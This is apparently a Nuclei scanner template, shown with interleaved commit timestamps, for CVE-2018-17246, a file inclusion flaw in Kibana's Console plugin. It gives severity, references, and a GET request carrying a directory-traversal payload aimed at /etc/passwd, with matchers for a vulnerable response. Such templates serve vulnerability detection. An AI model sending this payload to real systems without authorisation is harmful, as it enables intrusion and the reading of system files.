2021-04-08 21:05:42 +00:00
id : CVE-2018-17246
2022-04-22 10:38:41 +00:00
2021-04-08 21:01:08 +00:00
info :
2022-05-13 20:26:43 +00:00
name : Kibana - Local File Inclusion
2021-04-08 21:01:08 +00:00
author : princechaddha
2021-09-10 11:26:40 +00:00
severity : critical
2022-05-13 20:26:43 +00:00
description : Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
2021-08-18 11:37:49 +00:00
reference :
2021-04-08 21:01:08 +00:00
- https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md
2022-05-13 20:26:43 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-17246
2022-05-17 09:18:12 +00:00
- https://www.elastic.co/community/security
- https://discuss.elastic.co/t/elastic-stack-6-4-3-and-5-6-13-security-update/155594
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-17246
cwe-id : CWE-829
2022-08-27 04:41:18 +00:00
tags : cve,cve2018,lfi,kibana,vulhub
2021-04-08 21:01:08 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd"
matchers-condition : and
matchers :
- type : word
words :
- "\"message\":\"An internal server error occurred\""
part : body
- type : word
words :
- "kbn-name"
- "application/json"
- "kibana"
condition : and
part : header
- type : status
status :
- 500
2022-05-13 20:26:43 +00:00
# Enhanced by mp on 2022/05/13